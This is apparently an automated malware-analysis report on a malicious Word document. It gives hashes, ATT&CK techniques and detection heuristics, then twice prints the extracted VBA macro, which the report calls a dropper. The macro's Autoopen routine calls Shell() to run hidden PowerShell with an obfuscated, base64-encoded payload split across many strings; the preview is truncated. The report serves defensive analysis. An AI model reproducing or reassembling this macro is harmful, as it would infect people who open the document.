Office (OLE) malware analysis — malicious · 2eb3c9502d68b328

MALICIOUS

Office (OLE)

107.0 KB Created: 2018-05-24 08:43:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: 71c6550a1c7920ec9ca0465f080f1d20 SHA-1: ddf86aa738c7e05ecbaef71cd97256afdb287f19 SHA-256: 2eb3c9502d68b32862144a095d00a673f58b8258e7d2890bcb3fac25411d90a0

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The Autoopen macro triggers the execution of a Shell() command. This command constructs and executes a PowerShell command, which is heavily obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6555726-0' further supports its role as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6555726-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6555726-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16095 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	16095 bytes
SHA-256: `1906b446c291c171dd1daa8c8f1022b0580c33dbce99d0d4e50c834de90845ac`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "iCSzivhuC" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function AOnVBYMBvTC() On Error Resume Next dFWtF = zmmBj - Cos(ctHtab) * 1 - Chr(11530) / 97178 - ChrB(TsSIlw) zZZSE = 59273 uwKVBA = pnvvu - Cos(cLbUE) * 1 - Chr(13037) / 61656 - ChrB(NDlTM) mMbOtz = 93703 AOnVBYMBvTC = kOBowZZrP + aSqsqMVbb + tKRHitsFj + NDNVs + dFJzmHm + CGszKA + iKinzBhPkK + wiSRCvInc + BLftDFTsdRU uPGEw = dEXMr - Cos(lozFNz) * 1 - Chr(97617) / 74904 - ChrB(vZBoPc) MjBwJQ = 32851 End Function Sub Autoopen() On Error Resume Next OzINj = jYcUw - Cos(OVAvwJ) * 1 - Chr(61666) / 98566 - ChrB(EQjqAs) LviVXm = 83710 EFNIR (AOnVBYMBvTC) plGYO = ZTQiO - Cos(fGzAjR) * 1 - Chr(40041) / 19442 - ChrB(ZWfPqN) mdacdm = 12222 End Sub Function EFNIR(hBrfDFE) On Error Resume Next DHkpi = SMmBKE - Cos(ilFRhf) * 1 - Chr(31444) / 28092 - ChrB(IXotjn) lMtzk = 94221 jffkGK = NfIjEr - Cos(KwGqw) * 1 - Chr(54272) / 97357 - ChrB(BlRfJ) pRFMl = 17955 WzmUfvbCSQA = Shell(tzhROzOl + Chr(vbKeyP) + RLZAzJ + hBrfDFE, vbHide) mBuJE = usfJcv - Cos(aQmJlU) * 1 - Chr(57372) / 38614 - ChrB(uTbAtY) CXTiw = 47379 End Function Attribute VB_Name = "LjuuDUVbpjbZYi" Function kOBowZZrP() On Error Resume Next tqcFMX = naChUZ - Cos(fwPTCw) * 1 - Chr(56015) / 3478 - ChrB(CFviuU) uXMZP = 98908 VqJZDjIh = "owersHeLL -WinD" + "owsTy" + "le hidd" + "en -e LgAoACAAK" + "ABbAHMAVABSAEk" + "ATgBHAF0" + "AJABWA" + "GUAcgBCAG8AU" + "wBlAFAA" + "UgBlAEYARQBSAGU" ptVOwv = iXZTcb - Cos(dLYKr) * 1 - Chr(10801) / 49423 - ChrB(RsuSF) KHAVf = 46870 pYYpB = "ATgBDAEUAKQBbA" + "DEALAAzAF0AKwAn" + "AHgAJwAtA" + "EoATwBpAG4AJ" + "wAnACkAKAAoAC" + "gAKAAiAHsAOAB" ZjhjF = YhWLSt - Cos(RLnOX) * 1 - Chr(88113) / 1045 - ChrB(ccTiqd) QYwwC = 64209 JihFAzamPRK = "9AHsAMwA3AH0" + "AewAxAD" + "AAOAB9AHsAOAAw" + "AH0AewA" + "yAH0AewA0ADI" + "AfQB7" + "ADEAMgB9AHsANQA" iqilF = SuhcZ - Cos(qwTlzm) * 1 - Chr(45831) / 70779 - ChrB(EOCPWE) zNVqj = 25449 BJMkjH = "2AH0Aew" + "AxADEANgB9AHsAN" + "AA1AH0AewA" + "5ADMA" + "fQB7A" + "DcANAB9AHsA" + "OQA2AH0AewAxADE" + "ANQB9AHsAOQA3A" zklozW = urFwnV - Cos(nAKfwG) * 1 - Chr(50498) / 54821 - ChrB(VjzBzU) iLdRW = 2937 Ouzwa = "H0AewAzADUAfQ" + "B7ADEAMQB9A" + "HsAMg" + "A5AH0AewAx" + "ADIAMgB9AHsAN" + "AA2AH0AewA1" zYOQJ = zRjiU - Cos(MLLjG) * 1 - Chr(12547) / 39785 - ChrB(PECVj) kWmJD = 50766 rsvTonlIZc = "ADAAfQB7ADE" + "ANAB9AHsAM" + "gAzAH0A" + "ewA4ADEAf" oMGiqQ = iEAOj - Cos(HuWbWL) * 1 - Chr(2965) / 87507 - ChrB(tWtjjm) iZfuYY = 99101 LjQfWPc = "QB7ADEAOQB9A" + "HsANQA" + "4AH0AewA1ADI" + "AfQB7ADE" + "ANQB9AH" + "sAMwAyAH0Aew" + "AxADAANgB9" + "AHsANg" + "A0AH0" + "AewAxAD" BQqPd = EnowS - Cos(zLnsYs) * 1 - Chr(84321) / 36062 - ChrB(oJjTEZ) jlOjvR = 49181 iWiSKDAAl = "EANwB9A" + "HsANgAxA" + "H0AewA2ADcAfQB" + "7ADEAMgA4" + "AH0AewA3ADAAfQ" + "B7ADkA" kOBowZZrP = VqJZDjIh + pYYpB + JihFAzamPRK + BJMkjH + Ouzwa + rsvTonlIZc + LjQfWPc + iWiSKDAAl End Function Function aSqsqMVbb() On Error Resume Next VmQkp = EkRvaT - Cos(mVjhjU) * 1 - Chr(25775) / 13743 - ChrB(vZmdE) hjvil = 65194 jDKjTDmHYDJ = "fQB7ADMANAB9AHs" + "ANgAy" + "AH0AewA4A" + "DYAfQB7A" + "DcAOQ" + "B9AHsA" + "MQAzAH0A" + "ewA5AD" mbHdB = ZOXdGo - Cos(QiCOwM) * 1 - Chr(96943) / 23054 - ChrB(rwLiBC) AshEPj = 8392 UaFZb = "QAfQB7" + "ADYAOQB9" + "AHsAMQAzA" + "DQAfQB" + "7ADEAMQA4AH0Aew" DTdhu = vjoHm - Cos(hjlZjK) * 1 - Chr(92025) / 70692 - ChrB(SXhWj) lYkjj = 58064 stYpJtBpiD = "AxADIA" + "NAB9AH" + "sAMQAzADMAfQB" + "7ADcAfQB7ADE" + "AMgA1AH0AewAx" LdiQRS = RWWODB - Cos(HHUEn) * 1 - Chr(37700) / 31515 - ChrB(vvKOAK) EaGUE = 41930 PzXhzzYBPhf = "ADMAM" + "gB9AHsAMgA4AH0" + "AewA0AD" + "kAfQB7ADgANAB9A" + "HsAMwA4AH0Aew" + "AzADkAfQB7ADcA" rStdp = vBTTiD - Cos(QPbtKM) * 1 - Chr(50041) / 66053 - ChrB(GCRlKS) IizzzQ = 3810 AWkDG = "NgB9AHsANwA" + "4AH0AewA4ADcAfQ" + "B7ADYAfQB7A" + "DYAMwB9AHsAMg" + "AwAH0AewAyA" + "DUAf ... (truncated)

SHA-256: 1906b446c291c171dd1daa8c8f1022b0580c33dbce99d0d4e50c834de90845ac

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "iCSzivhuC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function AOnVBYMBvTC()
On Error Resume Next
dFWtF = zmmBj - Cos(ctHtab) * 1 - Chr(11530) / 97178 - ChrB(TsSIlw)
zZZSE = 59273
uwKVBA = pnvvu - Cos(cLbUE) * 1 - Chr(13037) / 61656 - ChrB(NDlTM)
mMbOtz = 93703
AOnVBYMBvTC = kOBowZZrP + aSqsqMVbb + tKRHitsFj + NDNVs + dFJzmHm + CGszKA + iKinzBhPkK + wiSRCvInc + BLftDFTsdRU
uPGEw = dEXMr - Cos(lozFNz) * 1 - Chr(97617) / 74904 - ChrB(vZBoPc)
MjBwJQ = 32851
End Function
Sub Autoopen()
On Error Resume Next
OzINj = jYcUw - Cos(OVAvwJ) * 1 - Chr(61666) / 98566 - ChrB(EQjqAs)
LviVXm = 83710
EFNIR (AOnVBYMBvTC)
plGYO = ZTQiO - Cos(fGzAjR) * 1 - Chr(40041) / 19442 - ChrB(ZWfPqN)
mdacdm = 12222
End Sub
Function EFNIR(hBrfDFE)
On Error Resume Next
DHkpi = SMmBKE - Cos(ilFRhf) * 1 - Chr(31444) / 28092 - ChrB(IXotjn)
lMtzk = 94221
jffkGK = NfIjEr - Cos(KwGqw) * 1 - Chr(54272) / 97357 - ChrB(BlRfJ)
pRFMl = 17955
WzmUfvbCSQA = Shell(tzhROzOl + Chr(vbKeyP) + RLZAzJ + hBrfDFE, vbHide)
mBuJE = usfJcv - Cos(aQmJlU) * 1 - Chr(57372) / 38614 - ChrB(uTbAtY)
CXTiw = 47379
End Function


Attribute VB_Name = "LjuuDUVbpjbZYi"
Function kOBowZZrP()
On Error Resume Next
tqcFMX = naChUZ - Cos(fwPTCw) * 1 - Chr(56015) / 3478 - ChrB(CFviuU)
uXMZP = 98908
VqJZDjIh = "owersHeLL -WinD" + "owsTy" + "le hidd" + "en -e LgAoACAAK" + "ABbAHMAVABSAEk" + "ATgBHAF0" + "AJABWA" + "GUAcgBCAG8AU" + "wBlAFAA" + "UgBlAEYARQBSAGU"
ptVOwv = iXZTcb - Cos(dLYKr) * 1 - Chr(10801) / 49423 - ChrB(RsuSF)
KHAVf = 46870
pYYpB = "ATgBDAEUAKQBbA" + "DEALAAzAF0AKwAn" + "AHgAJwAtA" + "EoATwBpAG4AJ" + "wAnACkAKAAoAC" + "gAKAAiAHsAOAB"
ZjhjF = YhWLSt - Cos(RLnOX) * 1 - Chr(88113) / 1045 - ChrB(ccTiqd)
QYwwC = 64209
JihFAzamPRK = "9AHsAMwA3AH0" + "AewAxAD" + "AAOAB9AHsAOAAw" + "AH0AewA" + "yAH0AewA0ADI" + "AfQB7" + "ADEAMgB9AHsANQA"
iqilF = SuhcZ - Cos(qwTlzm) * 1 - Chr(45831) / 70779 - ChrB(EOCPWE)
zNVqj = 25449
BJMkjH = "2AH0Aew" + "AxADEANgB9AHsAN" + "AA1AH0AewA" + "5ADMA" + "fQB7A" + "DcANAB9AHsA" + "OQA2AH0AewAxADE" + "ANQB9AHsAOQA3A"
zklozW = urFwnV - Cos(nAKfwG) * 1 - Chr(50498) / 54821 - ChrB(VjzBzU)
iLdRW = 2937
Ouzwa = "H0AewAzADUAfQ" + "B7ADEAMQB9A" + "HsAMg" + "A5AH0AewAx" + "ADIAMgB9AHsAN" + "AA2AH0AewA1"
zYOQJ = zRjiU - Cos(MLLjG) * 1 - Chr(12547) / 39785 - ChrB(PECVj)
kWmJD = 50766
rsvTonlIZc = "ADAAfQB7ADE" + "ANAB9AHsAM" + "gAzAH0A" + "ewA4ADEAf"
oMGiqQ = iEAOj - Cos(HuWbWL) * 1 - Chr(2965) / 87507 - ChrB(tWtjjm)
iZfuYY = 99101
LjQfWPc = "QB7ADEAOQB9A" + "HsANQA" + "4AH0AewA1ADI" + "AfQB7ADE" + "ANQB9AH" + "sAMwAyAH0Aew" + "AxADAANgB9" + "AHsANg" + "A0AH0" + "AewAxAD"
BQqPd = EnowS - Cos(zLnsYs) * 1 - Chr(84321) / 36062 - ChrB(oJjTEZ)
jlOjvR = 49181
iWiSKDAAl = "EANwB9A" + "HsANgAxA" + "H0AewA2ADcAfQB" + "7ADEAMgA4" + "AH0AewA3ADAAfQ" + "B7ADkA"
kOBowZZrP = VqJZDjIh + pYYpB + JihFAzamPRK + BJMkjH + Ouzwa + rsvTonlIZc + LjQfWPc + iWiSKDAAl
End Function
Function aSqsqMVbb()
On Error Resume Next
VmQkp = EkRvaT - Cos(mVjhjU) * 1 - Chr(25775) / 13743 - ChrB(vZmdE)
hjvil = 65194
jDKjTDmHYDJ = "fQB7ADMANAB9AHs" + "ANgAy" + "AH0AewA4A" + "DYAfQB7A" + "DcAOQ" + "B9AHsA" + "MQAzAH0A" + "ewA5AD"
mbHdB = ZOXdGo - Cos(QiCOwM) * 1 - Chr(96943) / 23054 - ChrB(rwLiBC)
AshEPj = 8392
UaFZb = "QAfQB7" + "ADYAOQB9" + "AHsAMQAzA" + "DQAfQB" + "7ADEAMQA4AH0Aew"
DTdhu = vjoHm - Cos(hjlZjK) * 1 - Chr(92025) / 70692 - ChrB(SXhWj)
lYkjj = 58064
stYpJtBpiD = "AxADIA" + "NAB9AH" + "sAMQAzADMAfQB" + "7ADcAfQB7ADE" + "AMgA1AH0AewAx"
LdiQRS = RWWODB - Cos(HHUEn) * 1 - Chr(37700) / 31515 - ChrB(vvKOAK)
EaGUE = 41930
PzXhzzYBPhf = "ADMAM" + "gB9AHsAMgA4AH0" + "AewA0AD" + "kAfQB7ADgANAB9A" + "HsAMwA4AH0Aew" + "AzADkAfQB7ADcA"
rStdp = vBTTiD - Cos(QPbtKM) * 1 - Chr(50041) / 66053 - ChrB(GCRlKS)
IizzzQ = 3810
AWkDG = "NgB9AHsANwA" + "4AH0AewA4ADcAfQ" + "B7ADYAfQB7A" + "DYAMwB9AHsAMg" + "AwAH0AewAyA" + "DUAf
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.